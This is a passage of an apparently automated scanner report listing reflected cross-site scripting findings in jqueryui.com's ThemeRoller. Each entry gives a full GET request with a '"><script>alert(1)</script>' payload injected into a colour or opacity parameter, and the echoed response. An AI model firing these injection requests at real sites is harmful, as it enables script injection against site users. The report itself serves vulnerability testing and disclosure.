mgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f8a"><script>alert(1)</script>5c9db817cbc was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&b
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8955b"><script>alert(1)</script>3d3632ac57f was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityEr
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6591f"><script>alert(1)</script>a2709f92cce was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&bor
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc89"><script>alert(1)</script>3fd82bd44b8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65e5"><script>alert(1)</script>00ab20f4a9f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
at.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2f2d"><script>alert(1)</script>97f8aa11556 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997f9"><script>alert(1)</script>4169bdc7a36 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
DD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconCo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4cd"><script>alert(1)</script>021c587b46e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=F
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e29"><script>alert(1)</script>b8d95e5854a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTex